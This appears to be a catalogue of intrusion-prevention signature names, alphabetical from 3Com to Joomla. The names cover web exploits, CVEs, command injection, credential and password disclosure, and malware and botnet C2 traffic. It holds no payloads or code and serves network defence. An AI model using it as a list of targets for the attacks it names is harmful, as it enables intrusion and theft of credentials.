HTTP_CSU-3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass
HTTP_CSU-427BB-HTML-Injection
HTTP_CSU-A1stats-Cgi-File-Disclosure
HTTP_CSU-Ababil-Trojan-Activity-Detected
HTTP_CSU-ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion
HTTP_CSU-Abyss-Web-Server-HTTP-Get-BOF
HTTP_CSU-Acceptable-Use-Of-PHP-In-URI
HTTP_CSU-Adobe-Acrobat-ActiveX-Null-Byte-In-Url-System-Compromise
HTTP_CSU-Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization
HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298-2
HTTP_CSU-Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961
HTTP_CSU-Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization
HTTP_CSU-Adobe-Flash-Player-Security-Bypass-CVE-2015-3102
HTTP_CSU-Advantech-Iview-Deleteztpconfig-SQL-Injection
HTTP_CSU-Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal
HTTP_CSU-Advantech-Iview-getInventoryReportData-SQL-Injection
HTTP_CSU-Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal
HTTP_CSU-Advantech-WebAccess-SQL-Injection
HTTP_CSU-Adware-180sa
HTTP_CSU-Adware-Adtomi
HTTP_CSU-Adware-Commonname
HTTP_CSU-Adware-Exactsearch
HTTP_CSU-Adware-Ilookup
HTTP_CSU-Adware-Searchcentrix
HTTP_CSU-Adware-Sidesearch
HTTP_CSU-Adware-Slotch
HTTP_CSU-Adware-Tvmedia
HTTP_CSU-Ainslot.b-Traffic
HTTP_CSU-Aiohttp-Directory-Traversal-CVE-2024-23334
HTTP_CSU-AirTies-RT-104-Router-Unauthorized-Config-Download
HTTP_CSU-AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability
HTTP_CSU-Aldi-Bot-Traffic
HTTP_CSU-Allaire-ColdFusion-cfcache.map-Disclosure
HTTP_CSU-Allegra-Siteconfigaction-Improper-Access-Control
HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Undocumented-API-Call
HTTP_CSU-Altavista-Query-Cgi-File-Disclosure
HTTP_CSU-Alueron-Activity
HTTP_CSU-Amaya-Sendtemp-Pl-File-Disclosure
HTTP_CSU-Amlib-NetOPAC-Stack-Remote-Buffer-Overflow
HTTP_CSU-Android-Spyeye-Trojan-Traffic
HTTP_CSU-Android-Stiniter.a-Traffic
HTTP_CSU-Anhttpd-Isapi-Count-Pl-DoS
HTTP_CSU-Apache-Activemq-File-Disclosure
HTTP_CSU-Apache-Airflow-Experimental-API-Request
HTTP_CSU-Apache-APISIX-Dashboard-Middleware-Authentication-Bypass
HTTP_CSU-Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS
HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing
HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing-2
HTTP_CSU-Apache-Backslash-Directory-Traversal
HTTP_CSU-Apache-Couchdb-Config-Command-Execution
HTTP_CSU-Apache-HTTP-Server-Illegal-Character-File-Disclosure
HTTP_CSU-Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-XSS
HTTP_CSU-Apache-HTTP-Server-Mod_Proxy_FTP-Wildcard-Characters-XSS
HTTP_CSU-Apache-HTTP-Server-Mod_Rewrite-Rewritelog-Command-Execution
HTTP_CSU-Apache-HTTP-Server-Path-Traversal-CVE-2021-41773
HTTP_CSU-Apache-Httpd-Apr_FilePath_Merge-Ntlm-Relay
HTTP_CSU-Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass
HTTP_CSU-Apache-Httpd-Mod_Md-Null-Pointer-Dereference
HTTP_CSU-Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass-2
HTTP_CSU-Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting
HTTP_CSU-Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting
HTTP_CSU-Apache-Jetspeed-Rest-API-Unauthorized-User-Modification
HTTP_CSU-Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
HTTP_CSU-Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection
HTTP_CSU-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow
HTTP_CSU-Apache-Ofbiz-Forgot-Password-Directory-Traversal
HTTP_CSU-Apache-OpenMeetings-Nettest-Web-Service-Denial-Of-Service
HTTP_CSU-Apache-Potential-Probe
HTTP_CSU-Apache-Rave-User-Information-Disclosure
HTTP_CSU-Apache-Roller-OGNL-Injection-Remote-Code-Execution
HTTP_CSU-Apache-Server-Status-Probe
HTTP_CSU-Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
HTTP_CSU-Apache-Solr-Fake-URL-Authentication-Bypass
HTTP_CSU-Apache-Solr-Remote-Code-Execution
HTTP_CSU-Apache-Solr-Replicationhandler-Server-Side-Request-Forgery
HTTP_CSU-Apache-Solr-Solrresourceloader-Directory-Traversal
HTTP_CSU-Apache-Source-Asp
HTTP_CSU-Apache-SSL-Proxy-Vulnerability
HTTP_CSU-Apache-Struts-2-CVE-2017-9805-Post-To-URL
HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CSU-Apache-Struts-Encoded-Dot-Dot-Slash-Directory-Traversal
HTTP_CSU-Apache-Struts-RCE-CVE-2018-11776
HTTP_CSU-Apache-Subversion-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference
HTTP_CSU-Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal
HTTP_CSU-Apache-Tomcat-Formauthenticator-Open-Redirect
HTTP_CSU-Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution
HTTP_CSU-Apache-Tomcat-Mod-jk.so-URI-Worker-Long-Url-Buffer-Overflow-2
HTTP_CSU-Apache-Tomcat-Servlet-Engine-Directory-Traversal-2
HTTP_CSU-Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting
HTTP_CSU-Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159
HTTP_CSU-Apple-Installer-Package-Filename-Format-String-Vulnerability
HTTP_CSU-Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure
HTTP_CSU-Arcadyan-Firmware-Path-Traversal-CVE-2021-20090
HTTP_CSU-ARS-VBS-Loader-C2-Traffic
HTTP_CSU-Artica-Proxy-Fw.login.php-Apikey-SQL-Injection
HTTP_CSU-Artica-Proxy-Images.listener.php-Arbitrary-File-Read
HTTP_CSU-Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization
HTTP_CSU-ASP.NET-Information-Disclosure-Vulnerability-CVE-2015-1648
HTTP_CSU-Asus-RT-N56U-Remote-Password-Disclosure
HTTP_CSU-Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure
HTTP_CSU-Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure
HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086
HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting
HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure
HTTP_CSU-Autodesk-Autocad-Request-To-Acad.FAS
HTTP_CSU-Autodesk-Autocad-Request-To-Acdimres.dll
HTTP_CSU-Autodesk-Autocad-Request-To-DWG-File
HTTP_CSU-Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection
HTTP_CSU-Avtech-IP-Camera-Cgi-Bin-Nobody-Access
HTTP_CSU-Awstats-Config-Parameter-Command-Execution
HTTP_CSU-Awstats-Configdir-Parameter-System-Compromise
HTTP_CSU-Awstats-Logfile-Parameter-Command-Execution
HTTP_CSU-Awstats-Migrate-Remote-Command-Execution
HTTP_CSU-Awstats-Plugin-Arbitrary-Command-Execution
HTTP_CSU-Awstats-Rawplugin-Log-Disclosure
HTTP_CSU-Awstats-Totals-Remote-Code-Execution
HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow
HTTP_CSU-Banker-Keylogger
HTTP_CSU-Bargain-Buddy-Traffic
HTTP_CSU-Barracuda-Spam-Firewall-Img-Pl-Compromise
HTTP_CSU-Bash-Shellshock-Code-Injection
HTTP_CSU-Bazar-Backdoor-Malware-Infection-Traffic
HTTP_CSU-BBShop-Remote-File-Inclusion
HTTP_CSU-Bea-WebLogic-Admin-Console-Cross-Site-Scripting
HTTP_CSU-Bea-WebLogic-XSS
HTTP_CSU-Beacon-Remote-File-Inclusion
HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure
HTTP_CSU-Beck-Gmbh-IPC@CHIP-Denial-of-Service
HTTP_CSU-Belkin-Wemo-UPnP-Remote-Code-Execution
HTTP_CSU-Bifrose.IQ-Traffic
HTTP_CSU-Bitcoin-Bot-Traffic
HTTP_CSU-Bmc-TrackIt-Password-Reset
HTTP_CSU-Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833
HTTP_CSU-Bobax-Activity
HTTP_CSU-Bookedspace
HTTP_CSU-Bredolab-Bot-Activity
HTTP_CSU-Buer-Loader-C2-Traffic
HTTP_CSU-Bugzilla-Globals-File-Disclosure
HTTP_CSU-CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure
HTTP_CSU-Cacti-Group-Cacti-Graph_view.php-SQL-Injection
HTTP_CSU-Campo-Downloader-Malware-Infection-Traffic
HTTP_CSU-Carberp-Botnet-Traffic-Detected
HTTP_CSU-Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability
HTTP_CSU-Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability
HTTP_CSU-Carlo-Gavazzi-PowerSoft-Directory-Traversal
HTTP_CSU-Certec-atvise-webMI2ADS-Denial-Of-Service
HTTP_CSU-Cgi-Bigconf-Access
HTTP_CSU-Cgi-Bin-Command-Injection
HTTP_CSU-Cgi-Nortel-Contivity-cgiproc-DoS
HTTP_CSU-CGIScript-csChatRBox-System-Compromise
HTTP_CSU-CGIScript-csGuestbook-System-Compromise
HTTP_CSU-CGIScript-csLiveSupport-System-Compromise
HTTP_CSU-CGIScript-csNews-Database-Information-Disclosure
HTTP_CSU-CGIScript-csNews-Path-Disclosure
HTTP_CSU-CGIScript-csNews-System-Compromise
HTTP_CSU-CGIScript-csNewsPro-System-Compromise
HTTP_CSU-CGIScript-csSearch-System-Compromise
HTTP_CSU-Cisco-Adaptive-Security-Appliance-Information-Disclosure
HTTP_CSU-Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read
HTTP_CSU-Cisco-ASA-Directory-Traversal
HTTP_CSU-Cisco-ASA-SSL-VPN-Privilege-Escalation
HTTP_CSU-Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection
HTTP_CSU-Cisco-Collaboration-Server-Upload-Vulnerability
HTTP_CSU-Cisco-Common-Services-Devices-Center-Cross-Site-Scripting
HTTP_CSU-Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting
HTTP_CSU-Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection
HTTP_CSU-Cisco-Dcnm-Unauthenticated-File-Download
HTTP_CSU-Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS
HTTP_CSU-Cisco-IOS-HTTP-Authentication-Bypass
HTTP_CSU-Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
HTTP_CSU-Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
HTTP_CSU-Cisco-IOS-XE-Rest-API-Authentication-Bypass
HTTP_CSU-Cisco-License-Manager-Server-Reportcsv-Directory-Traversal
HTTP_CSU-Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass
HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload
HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure
HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution
HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS
HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Request
HTTP_CSU-Cisco-Prime-Infrastructure-Remote-Code-Execution
HTTP_CSU-Cisco-PVC2300-POE-Video-Camera-Configuration-Download
HTTP_CSU-Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118
HTTP_CSU-Cisco-SA500-Series-Security-Appliances-SQL-Injection
HTTP_CSU-Cisco-Webex-Magic-Url-Remote-Command-Execution
HTTP_CSU-Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow
HTTP_CSU-Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure
HTTP_CSU-Clearsearch
HTTP_CSU-Clorius-Controls-ICS-SCADA-Information-Disclosure-Attempt
HTTP_CSU-Cmd-Exe-System-Compromise
HTTP_CSU-Cogent-DataHub-DirTrav
HTTP_CSU-ColdFusion-Exprcalc-File-Disclosure
HTTP_CSU-ColdFusion-Openfile-File-Import
HTTP_CSU-ColdFusion-Path-Information-Disclosure
HTTP_CSU-Command-Interpreter-In-Cgi
HTTP_CSU-Common-Command-Injection-String
HTTP_CSU-Common-Command-Injection-String-2
HTTP_CSU-Common-Command-Injection-String-3
HTTP_CSU-Comtrend-CT-5624-Router-Remote-Password-Disclosure
HTTP_CSU-Confluence-Access-Control-Vulnerability-CVE-2023-22515-2
HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-1
HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-2
HTTP_CSU-Confluence-Setupadministrator.action-Endpoint-Access
HTTP_CSU-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709
HTTP_CSU-Connectwise-Screenconnect-CVE-2024-1708-Post-Exploitation-Activity
HTTP_CSU-CoreHTTP-Url-Buffer-Overflow
HTTP_CSU-Count-Cgi-BOF
HTTP_CSU-Count-Cgi-Disclosure
HTTP_CSU-Craft-CMS-Remote-Code-Execution-CVE-2024-56145
HTTP_CSU-Cutwail-Bot-Activity
HTTP_CSU-D-Link-Command-Injection-CVE-2024-3273
HTTP_CSU-D-Link-DAP-1160-Authentication-Bypass
HTTP_CSU-D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078
HTTP_CSU-D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557
HTTP_CSU-D-Link-DSL-2750B-Command-Injection
HTTP_CSU-D-Link-DSR-250N-Denial-of-Service
HTTP_CSU-D-Link-Hardcoded-Credentials-CVE-2024-3272
HTTP_CSU-D-Link-Router-Directory-Traversal
HTTP_CSU-D-Link-Router-Password-Recovery
HTTP_CSU-D-Tale-RCE
HTTP_CSU-Dahua-Username-Password-Disclosure
HTTP_CSU-Danmec-Trojan-SQL-Injection-Attack
HTTP_CSU-Dark-Crystal-RAT-Infection-Traffic
HTTP_CSU-Darkness-Bot-Activity
HTTP_CSU-Darwin-Streaming-Server-Parse-Xml-File-Disclosure
HTTP_CSU-Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal
HTTP_CSU-Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection
HTTP_CSU-Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure
HTTP_CSU-Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS
HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection
HTTP_CSU-DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415
HTTP_CSU-DevDojo-Voyager-Reflected-XSS-CVE-2024-55416
HTTP_CSU-DFind-Scanner-Usage
HTTP_CSU-Dicoogle-PACS-Web-Server-Directory-Traversal
HTTP_CSU-Disk-Pulse-Enterprise-GET-Buffer-Overflow
HTTP_CSU-Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402
HTTP_CSU-DNSChanger-Scan-URL
HTTP_CSU-Docpile-Init-Path-Parameter-Remote-File-Inclusion
HTTP_CSU-Dolibarr-ERP-CRM-SQL-Injection
HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
HTTP_CSU-Dotcms-Cmsfilter-Assets-Access-Control-Weakness
HTTP_CSU-Dotdotdot-Directory-Traversal
HTTP_CSU-Double-Encoding-Usage
HTTP_CSU-Downloader-Abw3-Activity-Detected
HTTP_CSU-DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123
HTTP_CSU-Drupal-Coder-Module-Coder_upgrade.run-Remote-Code-Execution
HTTP_CSU-Drupal-Restws-Module-Page-Callback-Remote-Code-Execution
HTTP_CSU-Dynamicdesktopmedia
HTTP_CSU-e107-ePing-Plugin-Command-Execution
HTTP_CSU-e107-eTrace-Plugin-Command-Execution
HTTP_CSU-Easy-Homepage-Edit.cgi-Vulnerability
HTTP_CSU-Eaton-Shutdown-Module-DoS
HTTP_CSU-Ebates-Moneymaker
HTTP_CSU-Ecava-IntegraXOR-CVE-2014-0753
HTTP_CSU-Elastic-ElasticSearch-Snapshot-API-Directory-Traversal
HTTP_CSU-Elastic-Kibana-Server.js-Local-File-Inclusion
HTTP_CSU-ElasticSearch-File-Discosure
HTTP_CSU-EMC-Cmcne-Inmservlets-CSV-Information-Disclosure
HTTP_CSU-EMC-Cmcne-Inmservlets-Softwarefileuploadmoreinfoservlet-Directory-Traversal
HTTP_CSU-EMC-Cmcne-Inmservlets.war-Unifiedfileuploadmoreinfoservlet-Directory-Traversal
HTTP_CSU-Encoded-Crlf-Sequence
HTTP_CSU-Enfal-Traffic
HTTP_CSU-EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass
HTTP_CSU-Envoy-HTTP-Url-Path-Access-Control-Bypass
HTTP_CSU-Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255
HTTP_CSU-Ericom-AccessNow-Server-Buffer-Overflow
HTTP_CSU-Esf-Pfsense-Cross-Site-Scripting
HTTP_CSU-Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure
HTTP_CSU-Etcd-API-Stored-Keys-Disclosure
HTTP_CSU-EvoLogical-EvoCam-Web-Server-Buffer-Overflow
HTTP_CSU-Excessively-Long-Url
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-1
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-2
HTTP_CSU-EzSoftware-Eznet-Long-HTTP-Request-BOF-3
HTTP_CSU-F-Secure-Policy-Manager-Information-Disclosure
HTTP_CSU-F5-Big-IP-ASM-Stack-Based-Buffer-Overflow
HTTP_CSU-Fakerean-Botnet-Request
HTTP_CSU-FANUC-OlpcPRO-Directory-Traversal
HTTP_CSU-File-Type-Extension-Variables
HTTP_CSU-FinalDraft-C2-Activity
HTTP_CSU-Flatnuke-Id-Parameter-Directory-Traversal
HTTP_CSU-FoggyWeb-Backdoor-C2-Traffic
HTTP_CSU-ForgeRock-OpenAM-Jato-Java-Deserialization
HTTP_CSU-Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
HTTP_CSU-Foxit-Reader-Plugin-For-Firefox-Url-String-Stack-Buffer-Overflow
HTTP_CSU-FrontPage-Rad-Fp30reg-Access
HTTP_CSU-Gallery-Cross-Site-Scripting
HTTP_CSU-GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal
HTTP_CSU-General-Server-Status-Client-URI
HTTP_CSU-Get-Msdos-Device-Name-DoS
HTTP_CSU-Geutebruck-testaction-RCE
HTTP_CSU-Ghost-CMS-Static-theme.js-Path-Traversal
HTTP_CSU-Gila-CMS-Image-Upload-Remote-Code-Execution
HTTP_CSU-Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878
HTTP_CSU-Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835
HTTP_CSU-Gitlist-Unauthenticated-Remote-Command-Execution
HTTP_CSU-Glutton-Backdoor-HTTP-Traffic
HTTP_CSU-Go-Continuous-Delivery-Pre-Auth-Local-File-Read
HTTP_CSU-GoAhead-Web-Server-Source-Code-Exposure
HTTP_CSU-GoAhead-Webserver-Directory-Traversal
HTTP_CSU-GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204
HTTP_CSU-Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931
HTTP_CSU-Gogs-Git-Endpoints-Directory-Traversal
HTTP_CSU-Golbrnd.A-Traffic
HTTP_CSU-Google-Document-Embedder-Plugin-File-Disclosure
HTTP_CSU-Gozi-Malware-Infection-Traffic
HTTP_CSU-Gozi-Prinimalka-Trojan-Activity-Detected
HTTP_CSU-Grafana-HS-Pluginmarkdown-Directory-Traversal
HTTP_CSU-Grafana-Labs-Grafana-Snapshot-Authentication-Bypass
HTTP_CSU-Grafana-Local-File-Inclusion
HTTP_CSU-Graylog-Open-Cluster-Configuration-Insecure-Deserialization
HTTP_CSU-Hadooken-Malware-Activity
HTTP_CSU-Harbour-Networks-Routers-Information-Disclosure
HTTP_CSU-Harnig-Activity-Detected
HTTP_CSU-Headline-Portal-Engine-Php-Remote-File-Inclusion
HTTP_CSU-Heloag-Activity
HTTP_CSU-HiatusRAT-Malware-C2-Traffic
HTTP_CSU-Hikvision-IP-Camera-Unauthenticated-Password-Change
HTTP_CSU-Hiloti-Activity
HTTP_CSU-Hosting-Controller-HCDiskQuotaService-Access
HTTP_CSU-Hotbar-Activity
HTTP_CSU-HP-IMC-Faultdownloadservlet-Information-Disclosure
HTTP_CSU-HP-IMC-Ictdownloadservlet-Information-Disclosure
HTTP_CSU-HP-IMC-Syslogdownloadservlet-Information-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Database-Information-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Reportimgservlet-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure
HTTP_CSU-HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass
HTTP_CSU-HP-Network-Virtualization-Storedntxfile-Directory-Traversal
HTTP_CSU-HP-Network-Virtualization-toServerObject-Directory-Traversal
HTTP_CSU-HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow
HTTP_CSU-HP-OpenView-Network-Node-Manager-Command-Execution
HTTP_CSU-HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow
HTTP_CSU-HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Handling-BOF
HTTP_CSU-HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF
HTTP_CSU-HP-System-Management-Homepage-Iprange-Parameter-Code-Execution
HTTP_CSU-HPE-Intelligent-Management-Center-Iccselectdevtypebean-Expression-Language-Injection
HTTP_CSU-HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass
HTTP_CSU-HPE-Network-Automation-Permissionfilter-Authentication-Bypass
HTTP_CSU-HPE-Network-Automation-SQL-Injection-Remote-Code-Execution
HTTP_CSU-HTML-Tags-As-URI-Parameters
HTTP_CSU-HTTP-Request-Command-Execution
HTTP_CSU-HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow
HTTP_CSU-HTTPDX-TOLOG-Function-Format-String
HTTP_CSU-Huawei-SOHO-Router-Information-Disclosure
HTTP_CSU-IBM-BigFix-Relay-Servers-Information-Disclosure
HTTP_CSU-IBM-Data-Risk-Manager-Authentication-Bypass
HTTP_CSU-IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service
HTTP_CSU-IBM-Domino-Access
HTTP_CSU-IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service
HTTP_CSU-IBM-Lotus-Domino-Web-Service-Denial-Of-Service
HTTP_CSU-IBM-Lotus-Sametime-Information-Disclosure
HTTP_CSU-IBM-Lotus-Sametime-Room-Name-BruteForce
HTTP_CSU-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow
HTTP_CSU-IBM-Lotus-Sametime-User-Enumeration
HTTP_CSU-IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure
HTTP_CSU-IBM-Tivoli-Provisioning-Manager-OS-Deployment-BOF
HTTP_CSU-IBM-WebSphere-Application-Server-Cross-Site-Scripting
HTTP_CSU-IIS-ActivePerl-PerlIS.dll-Filename-Overflow
HTTP_CSU-IIS-FormJScript-Access
HTTP_CSU-IIS-Global-Asa-Access
HTTP_CSU-IIS-Htr-Buffer-Overflow
HTTP_CSU-IIS-Htr-File-Fragment-Disclosure
HTTP_CSU-IIS-Iissamples-Disclosure
HTTP_CSU-IIS-Index-Server-Path-Disclosure-Vulnerability
HTTP_CSU-IIS-ISM-DLL-Access
HTTP_CSU-IIS-Phone-Book-BOF
HTTP_CSU-IIS-ServerVariablesJScript-Path-Disclosure
HTTP_CSU-Illusion-Bot-Activity
HTTP_CSU-iMeshV8-Download
HTTP_CSU-Includer-Command-Execution
HTTP_CSU-Index-Server-Source-Code-Disclosure
HTTP_CSU-Indusoft-Web-Studio-sDoS-Denial-Of-Service
HTTP_CSU-Insecure-Microsoft-Library-Loading
HTTP_CSU-Internet-Explorer-Cross-Domain-Information-Disclosure
HTTP_CSU-Internet-Explorer-Domain-Url-Spoofing
HTTP_CSU-Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019
HTTP_CSU-Internetoptimizer
HTTP_CSU-Intersystems-Cache-DoS-1
HTTP_CSU-Intersystems-Cache-DoS-2
HTTP_CSU-IOServer-Directory-Traversal
HTTP_CSU-Ipswitch-IMail-Web-Calendar-File-Disclosure
HTTP_CSU-Ipswitch-WhatsUp-Gold-HTTP-Request-DoS
HTTP_CSU-Ipswitch-WhatsUp-Professional-SQL-Injection
HTTP_CSU-ipTime-G104BE-Router-Code-Execution
HTTP_CSU-IRIX-Webdist-RCE
HTTP_CSU-Ivanti-Avalanche-Imagefilepath-Directory-Traversal
HTTP_CSU-Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal
HTTP_CSU-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
HTTP_CSU-Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass
HTTP_CSU-Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963
HTTP_CSU-Ivanti-Connect-Auth-Bypass-CVE-2024-22024
HTTP_CSU-Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805
HTTP_CSU-Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
HTTP_CSU-Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
HTTP_CSU-Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078
HTTP_CSU-Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection
HTTP_CSU-JamMail-Command-Execution
HTTP_CSU-JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430
HTTP_CSU-JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809
HTTP_CSU-Jboss-Java-Application-Server-Source-Code-Disclosure
HTTP_CSU-Jboss_Seam_2_Code_Injection
HTTP_CSU-Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery
HTTP_CSU-Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting
HTTP_CSU-Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution
HTTP_CSU-Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting
HTTP_CSU-Jenkins-Plugin-Resources-Directory-Traversal
HTTP_CSU-Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal
HTTP_CSU-JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793
HTTP_CSU-JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting
HTTP_CSU-JetBrains-TeamCity-Path-Traversal-CVE-2024-27199
HTTP_CSU-Jetty-File-Disclosure-CVE-2021-28169
HTTP_CSU-Jetty-Web-INF-File-Disclosure
HTTP_CSU-Joomla-Administrator-Console-Access-Attempt
HTTP_CSU-Joomla-AllVideos-File-Disclosure
HTTP_CSU-Joomla-TinyMCE-File-Upload-Remote-Code-Execution
